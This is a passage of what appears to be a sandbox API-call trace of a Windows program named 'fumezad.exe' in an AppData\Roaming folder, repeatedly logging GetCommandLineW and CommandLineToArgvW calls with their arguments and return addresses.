0x606668*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.140] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.140] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6066e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.140] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.140] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x606768*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.140] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.140] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6067e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.140] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.140] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x606868*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.140] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.140] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6068e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.140] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.140] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x606968*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.140] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.140] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6069e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.140] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.140] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x606a68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.140] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.140] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x606ae8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.140] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.140] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x606be8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.140] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.140] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x606c68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.140] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.140] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x606ce8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.140] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.140] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x606d68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.140] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.140] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x606de8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.140] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.141] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x606e68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.141] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.141] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x606ee8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.141] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.141] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x606f68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.141] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.141] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x606fe8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.141] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.141] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x607068*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.141] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.141] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6070e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.141] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.141] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x607168*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.141] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.141] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6071e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.141] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.141] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x607268*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.141] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.141] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6072e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.141] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.141] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x607368*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.141] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.141] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6073e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.141] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.141] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x607468*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.141] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.141] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6074e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.141] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.141] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x607568*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.141] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.141] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6075e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.141] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.141] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x607668*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.141] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.141] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6076e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.142] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.142] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x607768*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.142] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.142] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6077e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.142] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.142] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x607868*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.142] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.142] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6078e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.142] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.142] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x607968*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.142] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.142] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6079e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.142] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.142] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x607a68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.142] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.142] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x607ae8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.142] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.142] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x607b68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.142] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.142] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x607be8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.142] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.142] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x607c68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.142] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.142] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x607ce8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.142] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.142] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x607d68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.142] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.142] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x607de8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.142] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.142] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x607e68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.142] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.142] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x607ee8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.142] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.142] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x607f68*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.143] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.143] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x607fe8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.143] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.143] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x608068*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.143] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.143] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6080e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.143] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.143] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x608168*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.143] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.143] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6081e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.143] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.143] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x608268*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.143] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.143] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6082e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.143] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.143] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x608368*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.143] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.143] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6083e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.143] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.143] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x608468*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.143] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.143] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6084e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.143] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.143] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x608568*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.143] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.143] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6085e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.143] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.143] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x608668*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.143] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.143] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6086e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.143] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.143] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x608768*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.143] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.143] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x6087e8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.143] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.144] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x608868*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0128.144] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0128.144] CommandLineToArgvW (in: 